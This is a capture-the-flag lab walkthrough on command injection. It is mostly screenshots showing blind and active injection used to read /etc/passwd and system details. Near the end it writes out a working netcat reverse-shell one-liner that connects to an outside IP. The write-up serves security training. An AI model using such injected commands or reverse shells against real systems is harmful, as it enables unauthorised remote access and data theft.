# Injection ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaE_26P8MCb44zUQxc%2Fimage.png?alt=media\&token=644f7ab0-87e8-4d4f-b9e4-b8449aa4fbb5) ## An introduction to Command Injection ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaEeHsyHSZ3qkOJHPt%2Fimage.png?alt=media\&token=aa3cc0d8-1d27-4e0a-a1c7-91bdcaf91a34) ## Blind Command Injection ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaF9SVjRYR6CEzjCM4%2Fimage.png?alt=media\&token=c9ceab5a-e396-40b9-a920-db955bc37266) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaFSNcnmlRFwG73Q-I%2Fimage.png?alt=media\&token=def97b31-9d4e-4e5e-b6c5-14902df6adce) Lets go to the webpage ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaFywoswht9gUrFoKG%2Fimage.png?alt=media\&token=9a1fd871-5054-466e-8346-df0fc43f6342) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaGhGE7RwZwq70jqLD%2Fimage.png?alt=media\&token=2317ea2a-a44b-4888-b2e1-e4a5dd02f3cc) Lets try to find the Kernel Version and redirect it to a file and then read the file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaItLmu5jwdU8MKFjy%2Fimage.png?alt=media\&token=62464579-7aa7-4f97-bbed-6d5510eb7a62) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJDFfzaZ30Gb0-hZh%2Fimage.png?alt=media\&token=3738a15d-0fcc-4233-8f81-8b12a68df461) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJNXqZKXLOOpioKvW%2Fimage.png?alt=media\&token=781774d2-9058-4b44-b4ec-920445a1d7f2) Now lets enter root and look at the response for the answer to the next question ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJhCWnznWKsi90S50%2Fimage.png?alt=media\&token=991dbd19-7c82-4bd3-a9e7-dc5e353dfc2a) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJkJJUaWCr2WNsmjB%2Fimage.png?alt=media\&token=4278b850-7a75-4b61-a91e-870a0bf15bb2) Now lets enter www-data ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJojs0xi77xXbfPe1%2Fimage.png?alt=media\&token=e73ced1b-39a8-4663-9336-e3508f50c393) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJrgDiFP2ZRySfVy7%2Fimage.png?alt=media\&token=3c029e44-8c0b-4c02-967d-b96e5eb2d1c9) Lets enter our name and see what the output is ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaJz3fBR0E4DHhkop8%2Fimage.png?alt=media\&token=80bdfb87-c8a6-4fec-8ed9-c8753962755c) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaK0n9AIxoHciErjqz%2Fimage.png?alt=media\&token=aae88067-6e8d-425b-bde4-cbdefaa210f2) ## Active Command Injection ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKSp0mzxYVPLg-N1q%2Fimage.png?alt=media\&token=bbb71beb-074f-45c4-96f1-1ebf610736a6) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKWD3d5yy_PsfN2Yp%2Fimage.png?alt=media\&token=8b3f4d0b-b61c-4bcb-9ac4-350d4f833893) Lets go to the webpage that they mention ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKd4fJA4Vg3CvaN0A%2Fimage.png?alt=media\&token=171698f0-f5cf-46cd-9f0f-491433929907) Lets look at the files and see if there is an interesting file with the ls command ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKt6xjeeOUV4wprJ2%2Fimage.png?alt=media\&token=8cedbd5c-4946-4395-8c52-595367e8350f) There is an interesting file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaKyHng0ASNYHNdoWG%2Fimage.png?alt=media\&token=0d56f218-1f89-4f5c-9fdf-6ff5a9b7af1c) To see how many users are there on the machine, we can read the /etc/passwd file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLAM7MxFrGytAmfw1%2Fimage.png?alt=media\&token=9940fbbd-586d-408e-adb0-89e859433c48) We can look at this output by going to the source code ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLK7g5QQ9jvlh0aDM%2Fimage.png?alt=media\&token=686b1773-6d90-4550-92f3-4dfda2be7290) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLVRY0p7lCdttniYf%2Fimage.png?alt=media\&token=f0730a89-2441-4df7-8773-06f7d9819a6e) We can see which user the app is running as with the whoami command ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLgAuWf3NVLv5M84J%2Fimage.png?alt=media\&token=3d248e34-476c-4535-a2b8-aa5300f5121f) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLjk2XRggRwnaQx26%2Fimage.png?alt=media\&token=b8e14693-854d-458e-8e47-460787efc196) We can see what this user's shell is set as in the /etc/passwd file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaLzoB9RbBTchiPv3G%2Fimage.png?alt=media\&token=b8468129-ac47-4401-8f77-cfbcdaeddc9f) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaM5YheL988nkRGHK1%2Fimage.png?alt=media\&token=b882b4ef-33ec-43c6-862a-cc512d02c7f9) We can see what version of Ubuntu is running by using the command lsb\_release -a ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaMOqE_ZC3TZtRKkCD%2Fimage.png?alt=media\&token=ee65ea9d-ef86-469a-8d35-a00edb29fd8b) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaMSX_Wgx7izL1pd9I%2Fimage.png?alt=media\&token=629aa40a-bc8f-46ec-847b-63c035f37298) We can print out the MOTD with this command ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaMi0njl6p9Yu4xsSc%2Fimage.png?alt=media\&token=a18e4d89-423b-4cc0-98f8-60a46c6e8a58) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaMmGFwf-_Y4iomcOv%2Fimage.png?alt=media\&token=4fe36275-caa8-4576-ab35-e09611a784eb) ## Get the Flag! Lets first get a reverse shell on the machine so that we can navigate through the machine easier. First we start a netcat listener ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaNmfF9IWtYbeDDjy9%2Fimage.png?alt=media\&token=6e10d379-b376-4c6b-8d2b-177f0bbe2b5a) Now we use the reverse shell command ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaNzJ3MyCN3IWeToHo%2Fimage.png?alt=media\&token=19486a26-0ea3-4773-b7e3-9bfa222017e5) Lets hit Submit ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaO1xoNNQyM3euwW1f%2Fimage.png?alt=media\&token=e338a3da-2b48-4ffe-8b5f-ad5e814c1eb6) We have a shell, lets stabilize it ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaOJKjH6VP-D5R4gEl%2Fimage.png?alt=media\&token=f9118903-dec3-439f-9691-b5303e11a442) Lets now look for the flag, it might be a txt file and maybe called flag, so lets look for that ``` find / -type f -name flag.txt 2>/dev/null ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaOkd9doUu_kTx-QGP%2Fimage.png?alt=media\&token=c6cdff6b-0f5b-4ab5-985e-10c3ef987a3e) We have the flag, lets read it ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MeaEDIwSo3XTFlYCFND%2F-MeaOrzaSOVlgxlwsGWB%2Fimage.png?alt=media\&token=80200110-e8b6-4bd5-9b6a-5b611ce8de2a)